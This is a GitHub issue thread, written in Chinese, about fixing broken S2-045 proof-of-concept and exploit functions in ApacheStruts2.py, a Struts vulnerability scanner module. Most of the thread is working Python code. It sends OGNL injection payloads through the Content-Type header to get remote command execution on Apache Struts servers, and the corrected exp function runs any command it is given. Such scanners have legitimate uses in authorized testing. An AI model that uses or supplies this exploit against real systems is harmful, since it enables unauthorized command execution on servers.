ApacheStruts2.py S2-045 poc有错误
shadow1ng opened this issue · comments
self.headers2 = {
'User-Agent': self.ua,
'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
}
try:
self.req= requests.get(self.url, headers=self.headers1, timeout=self.timeout, verify=False)
if r"54289" in self.request.headers['FUCK']:
self.req 应该为self.request
s2_045_exp 也有问题
s2_046_exp 是正常的。
稍微把s2_045_exp 按s2_046_exp 的格式改了下,就正常了
self.headers2 = {
'User-Agent': self.ua,
'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
}
try:
self.req = requests.get(self.url, headers=self.headers2, timeout=self.timeout, verify=False)
self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.req.text, self.raw_data)
感谢 @shadow1ng 师傅的纠正
发现确实poc和exp都有问题
已经修复poc为:
def s2_045_poc(self):
self.threadLock.acquire()
md = random_md5()
cmd = "echo " + md
headers_1 = {
'User-Agent': self.ua,
'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
}
headers_2 = {
'User-Agent': self.ua,
'Content-Type': '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].'
'addHeader("FUCK",233*233)}.multipart/form-data'
}
try:
self.request = requests.post(self.url, headers=headers_1, timeout=self.timeout, verify=False)
if md in misinformation(self.request.text, md):
self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = self.payload_s2_045.replace("RECOMMAND", cmd)
self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
else:
self.request = requests.post(self.url, headers=headers_2, timeout=self.timeout, verify=False)
if r"54289" in self.request.headers['FUCK']:
self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("FUCK",233*233)}.multipart/form-data'
self.vul_info["prt_info"] = "[rce] [cmd: 233*233]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
修复exp为:
def s2_045_exp(self, cmd):
vul_name = "Apache Struts2: S2-045"
headers = {
'User-Agent': self.ua,
'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
}
try:
self.req = requests.post(self.url, headers=headers, timeout=self.timeout, verify=False)
self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.req.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
师傅的fscan很强很棒很喜欢